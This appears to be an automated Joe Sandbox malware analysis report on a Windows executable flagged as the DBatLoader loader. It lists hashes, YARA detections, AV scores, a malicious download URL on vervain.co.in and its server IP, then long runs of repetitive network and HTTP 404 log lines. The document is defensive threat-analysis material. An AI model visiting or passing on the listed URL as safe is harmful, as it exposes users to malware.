Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ncIpox4w8f

Overview

General Information

Sample Name:ncIpox4w8f (renamed file extension from none to exe)
Analysis ID:679306
MD5:03fb0f9df279b56130a63d5330461789
SHA1:705d9c59fe6cdeec9e28d1d803cb94765d1dc4de
SHA256:59290e0709f6bc918c12c38604eaabcd79b77f699ca2f1abf3af4fccef444a94
Tags:exe
Infos:

Detection

DBatLoader
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Yara detected DBatLoader
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
Sample file is different than original file name gathered from version info
PE file contains strange resources
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • ncIpox4w8f.exe (PID: 2916 cmdline: "C:\Users\user\Desktop\ncIpox4w8f.exe" MD5: 03FB0F9DF279B56130A63D5330461789)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
ncIpox4w8f.exeJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000000.238770915.0000000000401000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
      00000000.00000002.528757099.0000000002AC0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
        00000000.00000003.316597179.000000000540C000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
          00000000.00000003.297908164.0000000005536000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
            00000000.00000003.388263630.000000000571D000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
              Click to see the 14 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.0.ncIpox4w8f.exe.400000.0.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Snort Signatures

                No Snort rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: ncIpox4w8f.exeAvira: detected
                Multi AV Scanner detection for submitted file
                Source: ncIpox4w8f.exeVirustotal: Detection: 52%Perma Link
                Source: ncIpox4w8f.exeReversingLabs: Detection: 55%
                Antivirus detection for URL or domain
                Source: https://vervain.co.in/3437E44F6689E610&resi25412545d3437E44F6689E61025874515/JsibtswtoeethvjdrykaimaovwatvskAvira URL Cloud: Label: malware
                Multi AV Scanner detection for domain / URL
                Source: vervain.co.inVirustotal: Detection: 7%Perma Link
                Source: 0.2.ncIpox4w8f.exe.2a34530.0.unpackAvira: Label: TR/Patched.Ren.Gen
                Source: ncIpox4w8f.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                Source: unknownHTTPS traffic detected: 199.79.62.221:443 -> 192.168.2.4:49744 version: TLS 1.2
                Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: Joe Sandbox ViewIP Address: 199.79.62.221 199.79.62.221
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
                Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
                Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
                Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
                Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
                Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
                Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:08:22 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:08:23 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:08:24 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:08:25 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:08:26 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:08:28 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:08:29 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:08:30 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:08:31 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:08:33 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:08:38 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:08:39 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:08:41 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:08:42 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:08:43 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:08:45 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:08:46 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:08:47 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:08:49 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:08:50 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:08:51 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:08:53 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:08:59 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:09:01 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:09:02 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:09:03 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:09:04 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:09:06 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:09:08 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:09:10 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:09:11 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:09:12 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:09:13 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:09:14 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:09:16 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:09:20 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:09:22 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:09:23 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:09:24 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:09:25 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:09:27 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:09:28 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
